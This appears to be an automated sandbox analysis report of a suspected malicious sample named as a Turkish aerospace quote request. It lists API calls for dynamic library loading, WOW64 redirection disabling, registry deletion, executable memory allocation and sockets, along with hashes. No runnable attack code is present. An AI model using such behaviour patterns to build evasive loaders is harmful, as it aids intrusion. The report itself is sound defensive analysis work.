                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                                    • Opcode ID: 8861d8242ea9e5524d563994c356eafe70b119196f28dccbde1c22747eb7f6de
                                                                                                                                    • Instruction ID: cf4f60e89ee45b7e563f556ddde3797f991ecaa7305805c0be426c4fa5e1f080
                                                                                                                                    • Opcode Fuzzy Hash: 8861d8242ea9e5524d563994c356eafe70b119196f28dccbde1c22747eb7f6de
                                                                                                                                    • Instruction Fuzzy Hash: 5CD01270951713CFD7305F32D91860676E8AF067A1B61882DD4E9DA114E6B4E880C751
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,01021039), ref: 01020DF5
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01020E07
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                                    • Opcode ID: d3972bb9f285f078eedb48fbd72201c68d753126b7a2baeb9655aecc27d44efa
                                                                                                                                    • Instruction ID: 6c18c41cf9db0c9690ce582a131a295fc6820e6b546708ec08fddcc3e4251d27
                                                                                                                                    • Opcode Fuzzy Hash: d3972bb9f285f078eedb48fbd72201c68d753126b7a2baeb9655aecc27d44efa
                                                                                                                                    • Instruction Fuzzy Hash: A0D01270510723CFD7705F75C408647B6E5AF05696F618C6DE9C6D6104D6B9D4E0C750
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FA4BD0,?,00FA4DEF,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4C11
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4C23
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                                    • Opcode ID: 30264a49fbe41aa5f3700fbf1e247280222662798702f040e93aa348b6096480
                                                                                                                                    • Instruction ID: 217c0d9e45c1a72ab11372653bd4df22dfc5fcdb5d751a492d4ffe7af58c6dae
                                                                                                                                    • Opcode Fuzzy Hash: 30264a49fbe41aa5f3700fbf1e247280222662798702f040e93aa348b6096480
                                                                                                                                    • Instruction Fuzzy Hash: 7BD01270911713CFD7306F71D918607B6E5EF0A6A1B618C2DD4CAD6210E6F4E880C750
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,01018CF4,?,0102F910), ref: 010190EE
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01019100
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                                    • Opcode ID: 037e388141abf5be54928bf3bec4c38f65b8df718a9db7cb917aa8d1227f8131
                                                                                                                                    • Instruction ID: d344fe2d0bb21b18cf41d7130511b99b58552d5bd1d6c624dae9a2a163a659f7
                                                                                                                                    • Opcode Fuzzy Hash: 037e388141abf5be54928bf3bec4c38f65b8df718a9db7cb917aa8d1227f8131
                                                                                                                                    • Instruction Fuzzy Hash: A2D01734510723CFDB309F36D82960776E5AF0A695B26C86EE9C6DA544E6B9C4C0CB90
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                                    • Opcode ID: dcf3c337816b28508416f5c492ce092332a436e9c260133c2506022d89a7ef2b
                                                                                                                                    • Instruction ID: c1035e63a379a30d9dd3eea17c641b75235baaf833e4d02ec5c0cf4fa158fbe5
                                                                                                                                    • Opcode Fuzzy Hash: dcf3c337816b28508416f5c492ce092332a436e9c260133c2506022d89a7ef2b
                                                                                                                                    • Instruction Fuzzy Hash: BED01273805159EAC7149A939889EBD777CB709741F500456F80692140E2358798F621
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 636896c1529f5efce703f1a3b8f013f2e988054d24bb8dfca0398e96d5cec84a
                                                                                                                                    • Instruction ID: 24c29dba4e7b54534e2858e599ac92212c670d4343658d54d763bdc098a2e496
                                                                                                                                    • Opcode Fuzzy Hash: 636896c1529f5efce703f1a3b8f013f2e988054d24bb8dfca0398e96d5cec84a
                                                                                                                                    • Instruction Fuzzy Hash: A4C16C75A0421AEFCB14DF94C884EAEFBB5FF48710B148599E905EB261D730ED81EB90
                                                                                                                                    APIs
                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0101E0BE
                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0101E101
                                                                                                                                      • Part of subcall function 0101D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0101D7C5
                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0101E301
                                                                                                                                    • _memmove.LIBCMT ref: 0101E314
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3659485706-0
                                                                                                                                    • Opcode ID: 3f01d1b1cbb78d55a91afd71bc3292c978ea7fbfcbe0069d8a7c3a127c8dc404
                                                                                                                                    • Instruction ID: c76df6713682dbe8d128e495d3b2a9e63abeae79bffa33b9aaa9b4d340681a5b
                                                                                                                                    • Opcode Fuzzy Hash: 3f01d1b1cbb78d55a91afd71bc3292c978ea7fbfcbe0069d8a7c3a127c8dc404
                                                                                                                                    • Instruction Fuzzy Hash: 77C157716083018FC755DF28C880A6EBBE4FF89714F04896EF9999B351D739E946CB82
                                                                                                                                    APIs
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 010180C3
                                                                                                                                    • CoUninitialize.OLE32 ref: 010180CE
                                                                                                                                      • Part of subcall function 00FFD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FFD5D4
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 010180D9
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 010183AA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 780911581-0
                                                                                                                                    • Opcode ID: 7b5e4a69c46e27b8e8de1d905f5d0cdf7c2d28b04468ca7ab37be8844c5b5241
                                                                                                                                    • Instruction ID: 636f1d1d8a74bc13468f014af4767e2d9206f75167215ca2bbd0e27857cf1261
                                                                                                                                    • Opcode Fuzzy Hash: 7b5e4a69c46e27b8e8de1d905f5d0cdf7c2d28b04468ca7ab37be8844c5b5241
                                                                                                                                    • Instruction Fuzzy Hash: 68A169752047019FDB50DF54C881B6AB7E4BF8A354F48845DFA969B3A1CB78EE04CB82
                                                                                                                                    APIs
                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF76EA
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF7702
                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0102FB80,000000FF,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF7727
                                                                                                                                    • _memcmp.LIBCMT ref: 00FF7748
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 314563124-0
                                                                                                                                    • Opcode ID: 1ae52d5e116c0ff9dec3657765858db47d7db4d704a7412ac742b33b4a26dcaf
                                                                                                                                    • Instruction ID: 962e0c32296557c41c534b5dc2288577ec22e2d98fc629899a2c084164a0622d
                                                                                                                                    • Opcode Fuzzy Hash: 1ae52d5e116c0ff9dec3657765858db47d7db4d704a7412ac742b33b4a26dcaf
                                                                                                                                    • Instruction Fuzzy Hash: 0181FE75900209EFCB04DFA4C984DEEB7B9FF89315F244558E505EB260DB71AE05DB60
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2808897238-0
                                                                                                                                    • Opcode ID: d52f1f92745349006cb85a6da59485be2332c309931f9b3fb9eef3e75b40973e
                                                                                                                                    • Instruction ID: d857bd3db42298a20ad0b0e7a462307d019170df689a162411b4d47fc0bc5e43
                                                                                                                                    • Opcode Fuzzy Hash: d52f1f92745349006cb85a6da59485be2332c309931f9b3fb9eef3e75b40973e
                                                                                                                                    • Instruction Fuzzy Hash: 5551D375B0430ADADB24AF65D891B3EB3E5AF45310F20C81FE696DB2A1DF78D841A710
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(011FEBD8,?), ref: 01029863
                                                                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 01029896
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01029903
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                    • Opcode ID: 49af3bffc4e4290ee30487f6d9e2dfcf39a93588bb83ee570a3efe027cf1bbaf
                                                                                                                                    • Instruction ID: 053e7130836c370abaf3f0ff2082af8a8f0cd308cce23a6317b3524aae207b9d
                                                                                                                                    • Opcode Fuzzy Hash: 49af3bffc4e4290ee30487f6d9e2dfcf39a93588bb83ee570a3efe027cf1bbaf
                                                                                                                                    • Instruction Fuzzy Hash: 6E518274A00229EFCF21CF6CC884AAE7BF5FF45364F148199F8959B291D771A981CB90
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FF9AD2
                                                                                                                                    • __itow.LIBCMT ref: 00FF9B03
                                                                                                                                      • Part of subcall function 00FF9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FF9DBE
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FF9B6C
                                                                                                                                    • __itow.LIBCMT ref: 00FF9BC3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3379773720-0
                                                                                                                                    • Opcode ID: f9d81ed1d44f34ba0a9cd14cb99eb071b829b9f49470244b7acb57631c8b2479
                                                                                                                                    • Instruction ID: 7bebb116de7114108ed9ee0e2e49ba93f267805cd3db362cc90ed52fe2af9474
                                                                                                                                    • Opcode Fuzzy Hash: f9d81ed1d44f34ba0a9cd14cb99eb071b829b9f49470244b7acb57631c8b2479
                                                                                                                                    • Instruction Fuzzy Hash: 0B417070A0420DABDF21EF54DC45FFE7BB9EF89760F000059BA05662A1DBB49A44DBA1
                                                                                                                                    APIs
                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 010169D1
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010169E1
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01016A45
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 01016A51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2214342067-0
                                                                                                                                    • Opcode ID: 4b3e7810abb3deeb962cad285bd0ac4ff16247eea6f878ca8f6ad2abadd2f889
                                                                                                                                    • Instruction ID: 4c96861e6ca6a6b9eaccb3beebe3b0876a689cb9eb61e7098c91be7d6b401e32
                                                                                                                                    • Opcode Fuzzy Hash: 4b3e7810abb3deeb962cad285bd0ac4ff16247eea6f878ca8f6ad2abadd2f889
                                                                                                                                    • Instruction Fuzzy Hash: 5E41A2B57402006FEB60AF24CC86F7A77E49F05B54F44806CFA599B2C2DAF99D019B91
                                                                                                                                    APIs
                                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0102F910), ref: 010164A7
                                                                                                                                    • _strlen.LIBCMT ref: 010164D9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _strlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4218353326-0
                                                                                                                                    • Opcode ID: af98f00daafc8c09d59be43094798a9c47f341df4e88fbba293d3c16b841c0ac
                                                                                                                                    • Instruction ID: bc751d0a623a5ef5aeafce9de95f406746a7251dd97f8705b9092f2f0653c787
                                                                                                                                    • Opcode Fuzzy Hash: af98f00daafc8c09d59be43094798a9c47f341df4e88fbba293d3c16b841c0ac
                                                                                                                                    • Instruction Fuzzy Hash: 1E410671600105ABCB10EBA8DC85FFEB7F8AF05310F048159F95A9B296DF78AD04DB50
                                                                                                                                    APIs
                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0100B89E
                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0100B8C4
                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0100B8E9
                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0100B915
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                    • Opcode ID: b2c028525bcf09374605f30f2b4e3cec5764d6d10293cd4d98f1534827ab5621
                                                                                                                                    • Instruction ID: 85ddb17dbafe979cc5060cfad7dc7881945d83faeeac2a4e25d989cbe71e8134
                                                                                                                                    • Opcode Fuzzy Hash: b2c028525bcf09374605f30f2b4e3cec5764d6d10293cd4d98f1534827ab5621
